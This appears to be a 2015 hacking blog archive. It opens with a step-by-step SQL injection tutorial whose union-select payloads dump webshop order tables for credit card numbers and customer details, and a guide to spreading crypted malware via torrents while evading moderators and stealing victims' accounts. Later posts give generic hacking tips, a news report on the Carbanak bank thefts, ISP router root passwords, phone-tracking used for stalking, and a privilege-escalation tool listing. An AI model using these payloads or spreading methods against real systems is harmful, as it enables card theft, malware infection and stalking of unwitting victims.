Friday, March 13, 2015

Webshop Hacking

1) we got to search google for webshops , I used this dork :


CODE:
inurl:customer_testimonials.php testimonial_id=
2)lets say we got this site
CODE:
http://www.JustExample.com/customer_...stimonial_id=7
3) we got to check if its vulnerable to SQLi , we add this
CODE:
'
to url :


>>>
CODE:
http://www.JustExample.com/customer_...stimonial_id=7'
if we get a error means website its vuln.


4) we have to check for column number we try with 10 first
CODE:
+order+by+10-


- :


>>>




CODE:
http://www.JustExample.com/customer_...+order+by+10--






if we dont get a error means the website has more then 10 columns , if we get a error means the website has less then 10 columns


5 )this time we get a error now we try from 1 to 9




CODE:
+union+select+1,2,3,4,5,6,7,8,9--




>>>




CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--




now we found it the website has 9 columns


6) most of time we can get infos from table 3 and 6 , lets say now we can from 3 xD , now we can get database user , database name and database version in this way :


*- database user


CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database name


CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


*- database version


CODE:
http://www.JustExample.com/customer_...,4,5,6,7,8,9--


7) we need the table names we add this to url :


CODE:
+union+select+1,2,table_name,4,5,6,7,8,9+from+info rmation_schema.tables--






CODE:
http://www.JustExample.com/customer_...chema.tables--




8 ) now we need columns : we add this to url :




CODE:
+union+select+1,2,concat(table_name,char(58),colum n_name),4,5,6,7,8,9+from+information_schema.column s--


>>>


CODE:
http://www.JustExample.com/customer_...hema.columns--
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......




CODE:
+union+select+1,2,concat(payment_method,char(58),c c_type,char(58),cc_number,char(58),cc_expires),4,5 ,6,7,8,9fromorders--




>>>




CODE:
http://www.JustExample.com/customer_...+from+orders--




if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them




CODE:
+union+select+1,2,concat(orders_id,0x2F,cc_type,0x 2F,cc_owner,0x2F,cc_number,0x2F,cc_expires,0x2F,cu stomers_street_address,0x2F,customers_suburb,0x2F, customers_city,0x2F,customers_postcode,0x2F,custom ers_state,0x2F,customers_country,0x2F,customers_te lephone,0x2F,customers_email_address,0x2F,date_pur chased),4,5,6,7,8,9+from+orders+




>>>




CODE:
http://www.JustExample.com
/customer_testimonials.php?&testimonial_id=7+union+ select+1,2,concat(orders_id,0x2F,cc_type,0x2F,cc_o wner,0x2F,cc_number,0x2F,cc_expires,0x2F,customers _street_address,0x2F,customers_suburb,0x2F,custome rs_city,0x2F,customers_postcode,0x2F,customers_sta te,0x2F,customers_country,0x2F,customers_telephone ,0x2F,customers_email_address,0x2F,date_purchased) ,4,5,6,7,8,9+from+orders+




now one step left


10 ) get the credit cards and have fun

Spreading via Torrents

What will i learn in this tutorial?
How to correctly create a torrent that is destined for success.
How to make sure you get the most downloads possible.
And how to make the process much easier and more efficient.
Plus some great tips and tricks that you have not have seen in other tutorials.


Prelude:


This is not something that you will automatically have success with overnight. It takes some practice to get these things down to a science. At first it may seem overwhelming, and things happen that you can only learn from over time and experience. Which can be frustrating, but i am giving you all of the best tips to be successful in torrent spreading to make it easier for you. Hope you enjoy.




Basics
If you already know how to create torrents and how to use them then skip over this section. Still some useful information in here though.


Advanced


Preparation
Crypting and binding:
Make sure your server is 100% FUD run/scan.THIS IS THE MOST IMPORTANT BASIC STEP
When binding, make sure to make the server as the post install command.Most binders do this already when included with crypters, or made for hacking purposes.
If using iExpress, dont bind to anything over 80 megs. It wont execute correctly.
Always bind to the setup, not any other files that you include in the .rar. And if the setup is over 80 megs and you are using iExpress, i suggest trying a different program.


Creating a good torrent:
Use a popular program.
DO NOT USE AN ANTI-VIRUS OR FIREWALL PROGRAM!!!!
All torrent users want to find cracked programs, but DO NOT include the words "Cracked","Leaked","Keygen", or anything of that nature in your torrent name. Those torrents always get checked out first by site moderators, and for the most part, they are good. Especially the mods on #.org. Even if your server is FUD.
Use this list of trackers i am providing you with when you create the torrent. Also feel free to add your own.
Trackers:Spoiler (Click to View)


Make your torrent in .rar format and add extra files that look like legit components to the setup. But place the setup in plain sight as well as a "readme.txt" that explains how to run the setup. I have provided you with an example.






Uploading and seeding


Ok, heres where things start to need more attention to detail. It is a 3 day process, and requires some patience. After you get better at this method, you can throw multiple torrents up and manage them every 3 days, but be sure to keep them all on the same schedule to keep things organized.
Getting good accounts:
At the beginning of the 3 day cycle, go create an account at http://www.#.org. This is the hardest site to get accounts for, and ironically, the best site to get downloads. If you create an account, and then 3 hours later post a program, your torrent will last maybe 4 hours if your lucky. Even if its FUD. So its easy to create the account early, and have the torrent up for longer.
Look for accounts here on HF. If you see a TPB account being sold, buy it up as fast as possible. But always to make sure to take correct precautions when dealing with anyone on the internet. Anything with uploads and older than 2 weeks old is a great account spreading on TPB. Anything extra will just help even more.
Torrent spreading leads to more torrent accounts. Always run a stealer through your new victims to get as many accounts as possible. DDoser 4.1 is great for this since it has one built in. Dont cry if you lose some victims, because the accounts will lead to much more, and your servers are still fresh.
Having a good account on Demonoid and IPtorrents is great. The U/D ratio actually means alot to the users. So try to find the best accounts for those 2 sites.


Seeding:
You need some other seeds besides your connection before starting the 3 day cycle of uploading.
Go buy a seedbox or ask a couple friends to help you seed for a day or so. I would recommend a seedbox because they are relatively cheap, and make a HUGE difference in the beginning. This is also very important.
As soon as you have a good way of getting a few initial seeds, the rest is the order in which you upload to sites. Which i will also be helping you with.




Uploading 3 day schedule
Day 1:
Upload to these following sites.And if you can on some of them, spam them every couple hours to get maximum exposure. Like on btjunkie.org.




Dont get impatient, it will take a little bit to get seeds. But the more seeds you get, the more people will download your torrent on the next set of sites.


Day 2:
Now on to the next set of sites.These will guarantee some good seeds if you advertise your torrent correctly.




Only post on these sites until 24 hours after you posted on the day 1 sites.


Day 3:
And finally the big 3 sites. Here is where it all comes together and you get to see your torrent flourish.




Then just watch them and see how they do. I will also post some useful tips for each site.




Uploading tips for the big sites
#.org
Make sure to add a picture and product description in the torrent posting.
Act like you the part of a commonly known uploading crew to the site.
Upload at around 4 a.m central US time. This makes sure that most of the mods are asleep, and your torrent will be farther down the list and the mods wont check it in the morning, because it doesnt look to be very malicious with lots of seeds, a commonly known uploading crew in the name, doesnt advertise a cracked program, and hopefully your using a good account. Your torrent could live for up to 1-2 weeks depending on the circumstances.


Demonoid.com
Get the best accounts you can find. Or at least good ones until you get better at using this method.
Make sure to add a picture and product description in the torrent posting.
The mods at demonoid have never taken down my torrents until something got reported. Which will happen depending on how many downloads you get. Best thing to do is make sure its FUD for demonoid. TPB and IPtorrents is all about taking advantage of how much volume they have to sort though.
Always add the "Uploaded at demonoid.com.txt" into the torrent.
Some people have claimed to have done this and still have their torrent denied. You first create the .rar with all the files inside one folder aded to it, and let it compress. Then you drag the demonoid.txt file into it so it doesnt go into the original folder. The mods cant see the .txt file if its in the folder. It will only show 1 folder contained. Heres how it should look.




IPtorrents.com
Find a decent account to post with.
Make sure to add a picture and product description in the torrent posting.
And again,upload at around 4 a.m central US time. This makes sure that most of the mods are asleep and your torrent will do better.




Closing comments


This does take some self discipline and practice to get right, but it is very much worth the time to learn. I have seen way too many people asking how to spread via torrents lately so i though it would be a good idea to contribute this back to the community. If i have forgotten some things, i will add them in later. If this helped you, please let me know, thats why i posted it.

40 Hacking Tips For Beginners

1) Learning scripting languages such as Python, Perl and ruby can help you automate your tasks and for sure improve your skills.


2) Understanding all possible user inputs is the fastest way to
hack into the systems.


3) When u gain access to an account or whatever u hacking in
to, best practice do not alter anything. just monitor the activity
and continue fetching information u need.


4) Travel and see different countries, it will make you better.


5) Never hesitate for usage of Google and other resources available i.e. exploit-db, and be updated with versions and bugs in each versions, for example, if I talk about WordPress, then one who is looking to hack WordPress website or pentest, then he should be well aware of at least 3.0+ versions updating, so whichever version is being used on the website, he should know the vulnerabilities in that and their exploitation.


6) RTFM, don't expect handouts. Educated questions, gets
you educated answers.


7) Move to Linux, learn Programming Languages C, Pearl, Lisp, Java and Html and write open source programs.
Improve your functional English.


8) The most important factor for becoming a good hacker is, you
must have your personal interest with computers. Additionally,
you have to be definite in your work, such that you should take
exactly interest in One thing at a single time. After covering the
appropriate level of theory, the learner should try it practically as
much as his satisfaction level. Watching Tutorials only for taking
points, not really for following them from a to z exactly, because
you have to be a good learner only if you have your personal intention
for doing the things creatively.


9) One thing , Learn how old Hackers Started don't focus on new
Programs like BACKTRACK , METASPLOIT , Learn Manual Hacking ,
Learn Coding and be patient ! Knowledge will come with time !
and practice all methods.


10) Do not rely on tricks for hacking. As they will keep you a script
kiddie, get deep understanding about stuffs. And also don't rush
from one topic to another. All those combined will make you a better
hacker. "Slow and Steady wins the race".


11) A support will always lift you up. Join groups, forums. Keep yourself updated with latest hacking news by reading blogs [Like this ], tweets etc.


12) Understand what programming language to use at what moment.
You're time is valuable so don't waste it writing something that
could have been done faster! (and understand the difference
between a scripting language and a programming language,
python for example is a programming language.


13) During hacking remain mentally intact and focus on your
each step. During a step always remember your next steps
and the way you have to link them. Dont always use old methods
and tricks, try new one and use your own mind too. and remember
one thing that there is no shortcut of Hacking, to became a hacker
, you have to give your whole passion to hacking. "
Hacking is an Art, and Hacker is an Artist".


14) This Attitude should be there within "SWEAT MORE IN PRACTISE,
SO YOU BLEED LESS IN WAR".


15) Whatever you're going to test,start it with a basic stuff.
If you dont know any,start learning.


16) Enumeration is the key to pwnage, the more you
enumerate the more attack surface you get.


17) Be patient! Learn different protocols and read the RFCs
to understand how they work and if there are some "security
by design" issues. After that you should try to understand the
context you're in and therefore develop an exploit for this
particular context.


18) Sleep less, read more. Learn & Think & Try & Fail &
Never give up. Remember, "...imagination will take you everywhere".


19) Don't compete anyone, never think you are the best, just
compete "the you in the past". There will always be a vulnerability
waiting for being discovered, by someone who thinks different
Understanding human logic makes things easier. "Hackers realize, kiddies memorize".


20) Learn your own systems inside out, before moving on to other
systems. The better you know your own, the more capable you will
find yourself when it comes time to make your system work for you.




21) To be a good hacker, you need have good social engineering skills.
Try to understand your victim's mentality, it will give you the ability
to guess his/her confidential information.


22) A great person had said "if i had 8 hours to chop down a tree,
I'd spend 6 hours sharpening my axe". Apply this on yourself.
Prepare yourself! Learn programming, networking, scripting and
all, be passionate, motivate yourself then start hacking with your
own ideas...You will surely win!.


23) Use your inner power to became a great hacker. Just keep reading
.. The more you read..the more you understand things behind the scene.


24) A startup now can be just a pair of 22 year old guys. A company like that can move much more easily than one with 10 people, half of whom have kids.


25) Think of all the psychic energy expended in seeking a fundamental distinction between "algorithm" and "program".


26) If you don't have time to do it right, when will you have time to do it over? ~Sunny Rockzzzz
27) Out in the field, any connection with home just makes you weaker. It reminds you that you were once civilized, soft; and that can get you killed faster than a bullet through the head.”




28) Most hackers are young because young people tend to be adaptable. As long as you remain adaptable, you can always be a good hacker.”


29) Be very careful. We suggest getting a book on HTML to avoid becoming a real legend in the hacker world. Putting up a web page before you know how to put up a web page is generally a very bad idea. The .gov sites are an exception.


30) We were addicted to hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing damage or writing computer viruses.


31) To be a good hacker you have to learn from yourself. Learn from books like "The basics of ethical hacking and pen testing" and "The web app hackers handbook-Ed.2". Once you learnt these books i promise you will be able to hack systems as well as web apps.


32) Try to see, feel and possibly touch everything that you learn, only then you will be confident about your attacks/defenses.


33) Adopt the mindset of a hacker.


34) You may not be there yet but with everyday practice you will be closer than yesterday.


35) Set of code has to be made by a hacker Don't get caught Learn the basic functionality of a system and network then explore their loop holes Every developer make mistake while developing identify the exploit and notify them to the develope.


36) Learn Russian. Every infosecurity geek should know Russian.


37) When you learn something in this field, always put it to good use .Defacing websites will not make you a better hacker, but, helping someone with their security might earn you a respect even higher than what a blackhat may get .


38) Learn how the technology you are trying to hack works inside and out before you try to hack it. It's much easier to find a way in if you understand exactly how and why the technology works.


39) Be consistent. If you want to learn, dedicate a certain amount of time every week to learning. Don't take breaks because you will forget things. When it comes to ethical hacking, you have to learn and understand certain things before you can move on to understanding something else. Building on top of itself.


40) Behind every successful Coder there an even more successful De-coder to understand that code -HackersAuthority

Wednesday, February 18, 2015

Bank Hackers Steal Millions via Malware

PALO ALTO, Calif. — In late 2013, an A.T.M. in Kiev started dispensing cash at seemingly random times of day. No one had put in a card or touched a button. Cameras showed that the piles of money had been swept up by customers who appeared lucky to be there at the right moment.
But when a Russian cybersecurity firm, Kaspersky Lab, was called to Ukraine to investigate, it discovered that the errant machine was the least of the bank’s problems.
The bank’s internal computers, used by employees who process daily transfers and conduct bookkeeping, had been penetrated by malware that allowed cybercriminals to record their every move. The malicious software lurked for months, sending back video feeds and images that told a criminal group — including Russians, Chinese and Europeans — how the bank conducted its daily routines, according to the investigators.
Then the group impersonated bank officers, not only turning on various cash machines, but also transferring millions of dollars from banks in Russia, Japan, Switzerland, the United States and the Netherlands into dummy accounts set up in other countries.

Continue reading the main story

How Hackers Infiltrated Banks

Since late 2013, an unknown group of hackers has reportedly stolen $300 million ­— possibly as much as triple that amount — from banks across the world, with the majority of the victims in Russia. The attacks continue, all using roughly the same modus operandi:

BANK COMPUTERS
Hackers send email containing a malware program called Carbanak to hundreds of bank employees, hoping to infect a bank’s administrative computer.
HACKER
ADMIN PC
Programs installed by the malware record keystrokes and take screen shots of the bank’s computers, so that hackers can learn bank procedures. They also enable hackers to control the banks’ computers remotely.
ADMIN PC
HACKER
By mimicking the bank procedures they have learned, hackers direct the banks’ computers to steal money in a variety of ways:
Transferring money into hackers’ fraudulent
bank accounts
Using e-payment systems to send money to
fraudulent accounts overseas
Directing A.T.M.s to dispense money at set
times and locations

In a report to be published on Monday, and provided in advance to The New York Times, Kaspersky Lab says that the scope of this attack on more than 100 banks and other financial institutions in 30 nations could make it one of the largest bank thefts ever — and one conducted without the usual signs of robbery.
The Moscow-based firm says that because of nondisclosure agreements with the banks that were hit, it cannot name them. Officials at the White House and the F.B.I. have been briefed on the findings, but say that it will take time to confirm them and assess the losses.
Kaspersky Lab says it has seen evidence of $300 million in theft through clients, and believes the total could be triple that. But that projection is impossible to verify because the thefts were limited to $10 million a transaction, though some banks were hit several times. In many cases the hauls were more modest, presumably to avoid setting off alarms.
The majority of the targets were in Russia, but many were in Japan, the United States and Europe.
No bank has come forward acknowledging the theft, a common problem that President Obama alluded to on Friday when he attended the first White House summit meeting on cybersecurity and consumer protection at Stanford University. He urged passage of a law that would require public disclosure of any breach that compromised personal or financial information.
But the industry consortium that alerts banks to malicious activity, the Financial Services Information Sharing and Analysis Center, said in a statement that “our members are aware of this activity. We have disseminated intelligence on this attack to the members,” and that “some briefings were also provided by law enforcement entities.”
The American Bankers Association declined to comment, and an executive there, Douglas Johnson, said the group would let the financial services center’s statement serve as the only comment. Investigators at Interpol said their digital crimes specialists in Singapore were coordinating an investigation with law enforcement in affected countries. In the Netherlands, the Dutch High Tech Crime Unit, a division of the Dutch National Police that investigates some of the world’s most advanced financial cybercrime, has also been briefed.
The silence around the investigation appears motivated in part by the reluctance of banks to concede that their systems were so easily penetrated, and in part by the fact that the attacks appear to be continuing.
The managing director of the Kaspersky North America office in Boston, Chris Doggett, argued that the “Carbanak cybergang,” named for the malware it deployed, represents an increase in the sophistication of cyberattacks on financial firms.
“This is likely the most sophisticated attack the world has seen to date in terms of the tactics and methods that cybercriminals have used to remain covert,” Mr. Doggett said.
As in the recent attack on Sony Pictures, which Mr. Obama said again on Friday had been conducted by North Korea, the intruders in the bank thefts were enormously patient, placing surveillance software in the computers of system administrators and watching their moves for months. The evidence suggests this was not a nation state, but a specialized group of cybercriminals.
But the question remains how a fraud of this scale could have proceeded for nearly two years without banks, regulators or law enforcement catching on. Investigators say the answers may lie in the hackers’ technique.
In many ways, this hack began like any other. The cybercriminals sent their victims infected emails — a news clip or message that appeared to come from a colleague — as bait. When the bank employees clicked on the email, they inadvertently downloaded malicious code. That allowed the hackers to crawl across a bank’s network until they found employees who administered the cash transfer systems or remotely connected A.T.M.s.
Then, Kaspersky’s investigators said, the thieves installed a “RAT”— remote access tool — that could capture video and screenshots of the employees’ computers.
“The goal was to mimic their activities,” said Sergey Golovanov, who conducted the inquiry for Kaspersky Lab. “That way, everything would look like a normal, everyday transaction,” he said in a telephone interview from Russia.
The attackers took great pains to learn each bank’s particular system, while they set up fake accounts at banks in the United States and China that could serve as the destination for transfers. Two people briefed on the investigation said that the accounts were set up at J.P. Morgan Cha*se and the Agricultural Bank of China. Neither bank returned requests for comment.
Kaspersky Lab was founded in 1997 and has become one of Russia’s most recognized high-tech exports, but its market share in the United States has been hampered by its origins. Its founder, Eugene Kaspersky, studied cryptography at a high school that was co-sponsored by the K.G.B. and Russia’s Defense Ministry, and he worked for the Russian military before starting his firm.
When the time came to cash in on their activities — a period investigators say ranged from two to four months — the criminals pursued multiple routes. In some cases, they used online banking systems to transfer money to their accounts. In other cases, they ordered the banks’ A.T.M.s to dispense cash to terminals where one of their associates would be waiting.
But the largest sums were stolen by hacking into a bank’s accounting systems and briefly manipulating account balances. Using the access gained by impersonating the banking officers, the criminals first would inflate a balance — for example, an account with $1,000 would be altered to show $10,000. Then $9,000 would be transferred outside the bank. The actual account holder would not suspect a problem, and it would take the bank some time to figure out what had happened.  
“We found that many banks only check the accounts every 10 hours or so,” Mr. Golovanov of Kaspersky Lab said. “So in the interim, you could change the numbers and transfer the money.”
The hackers’ success rate was impressive. One Kaspersky client lost $7.3 million through A.T.M. withdrawals alone, the firm says in its report. Another lost $10 million from the exploitation of its accounting system. In some cases, transfers were run through the system operated by the Society for Worldwide Interbank Financial Telecommunication, or Swift, which banks use to transfer funds across borders. It has long been a target for hackers — and long been monitored by intelligence agencies.
Mr. Doggett likened most cyberthefts to “Bonnie and Clyde” operations, in which attackers break in, take whatever they can grab, and run. In this case, Mr. Doggett said, the heist was “much more ‘Ocean’s Eleven.’ ”

Saturday, February 7, 2015

Using your own router in tandem with the Actiontec V1000H Router and Telus Optik TV


In the ideal big-brother world of Telus they would have you only use their supplied hardware for networking - ie the Actiontec V1000H Router. For advanced users this is a serious pain, when your own router probably has a much richer feature set. For others you may just want complete control of your network and its hardware.

The solution? Log in as root, set the Actiontec to "bridged mode", essentially turning it into a standard modem. Now you can use your own router connected directly to the WAN. If you call Telus tech support, they won't have a clue what you're talking about when you mention bridging or just tell you it's not possible. I understand that it's more difficult for the Telus support people to read from their script when every customer could have a different router, but I, like many others, never call Telus tech support unless there is something broken on their side, like my service has dropped completely. You may be better off talking to brick wall for anything else.

If you don't enable bridging on the Actiontec and you use it with your router, you'll get a double NAT situation. While it may work, it will be a pain to configure and may result in some peculiar networking problems. This is exacerbated by the fact that you don't have access to fully configure the Actiontec router to work properly in this situation - like disabling DHCP. Check out this explanation of double NAT for more info.

The below instructions work flawlessly with my DDWRT54G v3 running Tomato Firmware v1.28.7633 .3-Toastman-VLAN-IPT-ND ND VPN


To start - knowing your logins:


There are a set of logins for the Actiontec - the one that you're given is a crippled account with limited access to settings.

default customer login is (can be changed after first login)
username: admin
password: telus

"poweruser" login - some options are still locked
username: tech
password: t3lu5tv

root login - all features are unlocked and configurable
(old firmware 31.30L.48)
username: root
password: m3di@r00m!

(new firmware 31.30L.55)
username: root
password: Thr33scr33n!


Bridged Mode - so you can use your third party router:


Before enabling bridged mode you may want to turn off wireless if you're going to use it on your own router. I've had some problems turning it off after enabling bridged mode. Also, you can unscrew the attached antennas, you don't need them if you've turned off wireless.

On your third party router change the default LAN subnet to something outside of the Actiontec's default subnet 192.168.1.0 255.255.255.0 - 10.0.0.0 255.0.0.0 should work fine.

To enable transparent bridging mode:
  1. log in as root
  2. go to "Advanced Setup"
  3. WAN IP Addressing
  4. 2. Select the ISP protocol below
  5. select "RFC 1483 Transparent Bridging"
Plug your own router (WAN port) into the actiontec router (LAN port), now your own router should transparently pass through the actiontec getting a DHCP assigned IP address directly from Telus. Some additional config may be necessary on your router.

To connect to the Actiontec router while in bridging mode:

Directly connect a computer to the actiontec router and change the adapter address to a static IP in the actiontec's default IP range.

192.168.1.1 should work.
Then connect to the router as usual - http://192.168.1.254

With bridging enabled, some strange behaviour is exhibited when logging in - you'll see below the log in section that it says you're already logged in as admin although you won't be able to view any of the configuration pages. When you log in as root you won't see any confirmation of a log in, you'll just get bumped back to the home page. You should be able to go to config pages once logged in though.

Alternatively you can log in using telnet if you want to enable it:
  1. Advanced Setup
  2. Remote
  3. Remote Telnet
  4. 1. Set the remote telnet state below.
  5. Local Telnet -> enable
  6. Set the user name and password for login
Use putty or some other terminal client and login using the username and password you've set.
Once logged in, you have a crippled shell - like the command "ls" and "cd" won't work.
To get a slightly more functional shell type "sh" to get a busybox shell.


To get Optik TV working with a third party router, you must enable multicasting:


If you don't have multicasting enabled on your third party router, TV channels will work for a few seconds then drop out.

For the tomato firmware this option is:
Advanced -> Firewall -> Multicast
Enable IGMPproxy
Check off the LAN segment you want to enable multicasting on - default should be LAN


Troubleshooting:


If you find you've locked yourself out of the router, or want to reset all the settings back to the defaults - do a factory reset.

Take a pen and press the reset button down (the button is recessed in a hole marked with a red circle around it) for a few seconds until the power light turns red, then unplug the power and plug it back in. The router will take around 30 seconds to reboot with the default settings.

If you need to do a factory reset or want to do other types of fiddling after being in bridged mode for awhile, disconnect the phone cable. Many people are reporting that their firmware gets updated immediately after a factory reset with the phone cable plugged in (ie being connected to the Internet) and the root password has been changed (unconfirmed) on newer versions of the firmware.


Friday, February 6, 2015

Track anyone in the UK via SMS

By using one of the many mobile phone location tracking services aimed at businesses or concerned parents, and some trickery it is possibly to get almost anyone’s mobile phone position without their agreement. All that is required is their mobile phone number, and carrier.
Over the past year a number sites have popped up offering web based mobile phone tracking services. To use their services you purchase a monthly subscription or set number of credits, and enter in the targets phone number. The target then receives an SMS message asking them to confirm they consent to the tracking. After the target replies, the tracker can then request their position online and receive a street address, post code, and map of their location with an accuracy of around 250 meters.
Source: Rootsecure
  • Although it is possible to get the location of a phone the target will receive the various SMS confirmation messages, alerting them to the fact they are being tracked.
  • Malicious use can be traced back to the tracker via credit card records / the trackers registered phone.
More:
For the past week I’ve been tracking my girlfriend through her mobile phone. I can see exactly where she is, at any time of day or night, within 150 yards, as long as her phone is on. It has been very interesting to find out about her day. Now I’m going to tell you how I did it.
The Guardian
A service has launched in the UK which allows you to track any mobile phone around the globe and follow its movements from your own computer. The Guardian ran a feature on it yesterday called ‘How I stalked my girlfriend’. It painted a scary picture.
The service is run by World-Tracker, a company based on the Isle of Man. When a mobile number is entered onto the World-Tracker website, a text message is sent to that phone, to ask if the person carrying the phone wishes to be tracked.
The Register

LinEnum – Linux Enumeration & Privilege Escalation Tool

LinEnum will automate many Local Linux Enumeration & Privilege Escalation checks documented in this cheat sheet. It’s a very basic shell script that performs over 65 checks, getting anything from kernel information to locating possible escalation points such as potentially useful SUID/GUID files and Sudo/rhost mis-configurations and more.
An additional ‘extra’ feature is that the script will also use a provided keyword to search through *.conf and *.log files. Any matches will be displayed along with the full file path and line number on which the keyword was identified.
LinEnum - Linux Enumeration & Privilege Escalation Tool
After the scan has completed (please be aware that it make take some time) you’ll be presented with (possibly quite extensive) output, to which any key findings will be highlighted in yellow with everything else documented under the relevant headings.
Usage
Checks/Tasks Performed
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
    • Current IP
    • Default route details
    • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • List all users including uid/gid information
    • List root accounts
    • Extracts password policies and hash storage method information
    • Checks umask value
    • Checks if password hashes are stored in /etc/passwd
    • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
    • Attempt to read restricted files i.e. /etc/shadow
    • List current users history files (i.e .bash_history, .nano_history etc.)
    • Basic SSH checks
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xined.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
    • Checks user config
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default/weak MYSQL accounts
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accessible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
You can download LinEnum v0.5 here:
master.zip